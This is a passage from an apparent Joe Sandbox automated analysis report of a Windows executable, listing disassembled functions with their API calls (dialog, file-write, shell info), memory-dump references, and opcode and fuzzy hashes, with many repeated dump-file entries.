                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$ClientDrawEdgeFillLongWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3481374107-0
                                                                                                      • Opcode ID: e8cfec484e0ef5a0949931e2ad442549fda3965c659d69b96471c2229f3c6ed5
                                                                                                      • Instruction ID: 96f4ce3220ef17525b354dea075bca18e00ecb8dabc2a2a3ce0780306437d17c
                                                                                                      • Opcode Fuzzy Hash: e8cfec484e0ef5a0949931e2ad442549fda3965c659d69b96471c2229f3c6ed5
                                                                                                      • Instruction Fuzzy Hash: 05012132900219BFDB109F64DC49FAABBB8FB54750F004926F955F2160D770A9058B95
                                                                                                      Function 004380A0 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InterlockedExchange.KERNEL32(004808E8,00000001), ref: 004380C8
                                                                                                      • InitializeCriticalSection.KERNEL32(004808D0,?,?,?,?,0042BF97,?,00422FDC,?,00000000,?,00000000,?), ref: 004380D3
                                                                                                      • EnterCriticalSection.KERNEL32(004808D0,?,00000000,00000000,0042DA97,00000000,?,?,?,?,?,0042BF97,?,00422FDC,?,00000000), ref: 00438112
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterExchangeInitializeInterlocked
                                                                                                      • String ID:
                                                                                                      • API String ID: 3643093385-0
                                                                                                      • Opcode ID: d66494a0eb13fe10eba1f62d4e9df0684cb66f902e58c6fc4cb43092a07d42e0
                                                                                                      • Instruction ID: c9d80109e13dfd4b469843542c2470c3f20b05a7db7b7469771456da1fb489db
                                                                                                      • Opcode Fuzzy Hash: d66494a0eb13fe10eba1f62d4e9df0684cb66f902e58c6fc4cb43092a07d42e0
                                                                                                      • Instruction Fuzzy Hash: 7CF04930B80300D7D9A0B7546C85A1F73A4EB48351F20243FF504E0102CD6848C9679D
                                                                                                      Function 0041F675 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EndDialog.USER32(?,00000000), ref: 0041F6D6
                                                                                                      • GetDlgItem.USER32(?,0000041D), ref: 0041F6F3
                                                                                                      • GetDlgItem.USER32(?,000003F7), ref: 0041F74C
                                                                                                      • SendMessageW.USER32(00000000), ref: 0041F753
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$DialogMessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 2485852401-0
                                                                                                      • Opcode ID: 3216459fc540d4e531237b778d380bc645650f6ab5a306c85b629d0275c759bf
                                                                                                      • Instruction ID: 4589bec126f157b5648a86f0faf83c62447a804bef39f48419c5bfca6cf3ada6
                                                                                                      • Opcode Fuzzy Hash: 3216459fc540d4e531237b778d380bc645650f6ab5a306c85b629d0275c759bf
                                                                                                      • Instruction Fuzzy Hash: 27F03673644308B7DB115F78DD89FDA3F69A704750F104032B609AA1E1C679D9C2975C
                                                                                                      Function 0042227A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog
                                                                                                      • String ID: 4AD$haE
                                                                                                      • API String ID: 3519838083-3153278071
                                                                                                      • Opcode ID: 6d132a9fc3f0d735449f9bf347e1c3d05544918b0632187a15c94de516fa9c18
                                                                                                      • Instruction ID: 53eb0837c9afbe067ad8e6f34041033c70a6c48e086f5cff045b2fc661608019
                                                                                                      • Opcode Fuzzy Hash: 6d132a9fc3f0d735449f9bf347e1c3d05544918b0632187a15c94de516fa9c18
                                                                                                      • Instruction Fuzzy Hash: 8F516171900159AADB01EBA5CD45FEFBBBCAF14308F10456BE515B32C2EBB85B08CB65
                                                                                                      Function 004280F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004280FD
                                                                                                      • ShowWindow.USER32(00000002,00000003,?,?,?,?,?,?,00480388), ref: 00428210
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prologShowWindow
                                                                                                      • String ID: 4AD
                                                                                                      • API String ID: 4073796076-1156607891
                                                                                                      • Opcode ID: a0ecf11c31ed5a611f6f36d25e2e4c9f8092b40c2aa8ff51468aef5b90a44fa7
                                                                                                      • Instruction ID: 3b141954379190a48d8d993430a4f0e98bc555348a22c9018f27cc243c95eeb1
                                                                                                      • Opcode Fuzzy Hash: a0ecf11c31ed5a611f6f36d25e2e4c9f8092b40c2aa8ff51468aef5b90a44fa7
                                                                                                      • Instruction Fuzzy Hash: 5D41A2B1900219EADF11EF65DD05EEF7B79EF04304F10402EF911A6192EB3D9A11CA65
                                                                                                      Function 0042A719 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 0042A71E
                                                                                                        • Part of subcall function 0042A66A: lstrlenW.KERNEL32(00000000,00000000,?,?,00456170), ref: 0042A6B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prologlstrlen
                                                                                                      • String ID: 4AD$m_disables_keys
                                                                                                      • API String ID: 2133942097-3718384811
                                                                                                      • Opcode ID: f8da5657193c805dbec4cc966c6f8df13c9c1a5a0a024951f06e509c142d1747
                                                                                                      • Instruction ID: def68cc15d8ecaea31b373a1595c16fd10cc034aa44c6832c727a84c1773622a
                                                                                                      • Opcode Fuzzy Hash: f8da5657193c805dbec4cc966c6f8df13c9c1a5a0a024951f06e509c142d1747
                                                                                                      • Instruction Fuzzy Hash: B7217F71A002199BDB14EBA5D846FEEB7B8AF44314F50012FE511F21C1EBBC9A44CB69
                                                                                                      Function 00421728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 0042172D
                                                                                                      • SendMessageW.USER32(?,00000440,?,00000000), ref: 00421798
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prologMessageSend
                                                                                                      • String ID: 4AD
                                                                                                      • API String ID: 2337391251-1156607891
                                                                                                      • Opcode ID: 9d20cf4c3af1f1d741efc3df65bd5fd9fc613dead04091213c1b6c6a3675d271
                                                                                                      • Instruction ID: 733a4daa048f09d878c84373d9e27e6e514a652ddd9bfd7e8f13655adea388da
                                                                                                      • Opcode Fuzzy Hash: 9d20cf4c3af1f1d741efc3df65bd5fd9fc613dead04091213c1b6c6a3675d271
                                                                                                      • Instruction Fuzzy Hash: 06116A72D14248EBDB10DFA9D845BDEFBB8BF54318F10816AE251B71D0C7B85648CBA8
                                                                                                      Function 004217C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004217CB
                                                                                                        • Part of subcall function 0043226F: __EH_prolog.LIBCMT ref: 00432274
                                                                                                        • Part of subcall function 0043226F: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000400,?,?,?,00456830,00000000), ref: 0043234B
                                                                                                        • Part of subcall function 004323BC: __EH_prolog.LIBCMT ref: 004323C1
                                                                                                        • Part of subcall function 004323BC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,?,00000000,?,?,0042181D,00456830,?,?,?), ref: 004323E2
                                                                                                        • Part of subcall function 004323BC: WriteFile.KERNEL32(00000000,?,00000002,?,00000000,00456830,?,00000000,?,?,0042181D,00456830,?,?,?,?), ref: 0043240B
                                                                                                        • Part of subcall function 004323BC: WriteFile.KERNEL32(00000000,00000000,?,?,?,00000000,?,00000000,?,?,0042181D,00456830,?,?,?,?), ref: 00432428
                                                                                                        • Part of subcall function 004323BC: CloseHandle.KERNEL32(00000000,?,00000000,?,?,0042181D,00456830,?,?,?,?,?,?,00421E9B,?,?), ref: 0043242B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileH_prolog$Write$CloseCreateHandlelstrlen
                                                                                                      • String ID: 0hE$4AD
                                                                                                      • API String ID: 1478509966-3579489994
                                                                                                      • Opcode ID: 7e589b89833c60c49489fac9d0db62950789f152dbbd488099fcd24d5601660c
                                                                                                      • Instruction ID: 9e83c795c787fddd3087b27f22b1da45db781b12704cccbdf9cbf08cfdd3352a
                                                                                                      • Opcode Fuzzy Hash: 7e589b89833c60c49489fac9d0db62950789f152dbbd488099fcd24d5601660c
                                                                                                      • Instruction Fuzzy Hash: 7C018672915115ABEB08EB95E906ABF73B8EF09324F10552FF051A31C0DB785A048AA9
                                                                                                      Function 004353F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SHGetFileInfoW.SHELL32(C:\,00000000,00004001,000002B4,00004001), ref: 00435438
                                                                                                      • SHGetFileInfoW.SHELL32(C:\,00000000,?,000002B4,00004000), ref: 0043544B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileInfo
                                                                                                      • String ID: C:\
                                                                                                      • API String ID: 4041567068-3404278061
                                                                                                      • Opcode ID: 01dc84b88e69e622cc95e543275c728969252cc4be772f7a86a4fbfaad203ff7
                                                                                                      • Instruction ID: 1c494cc5095be1daaf244086f18a01e1dbc19f33f732a340317776a5c34a2c14
                                                                                                      • Opcode Fuzzy Hash: 01dc84b88e69e622cc95e543275c728969252cc4be772f7a86a4fbfaad203ff7
                                                                                                      • Instruction Fuzzy Hash: 99F012B25007046FF324DA15FD80B67B7DCEBC5704F41883AB650A7291D7B569088B6A
                                                                                                      Function 0041F7D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MessageBoxW.USER32(?,00000000,00000000,00000040), ref: 0041F80C
                                                                                                      • ShowWindow.USER32(?,00000000,?,?,00429448,?,?,?,0041F4CA,?,?), ref: 0041F817
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
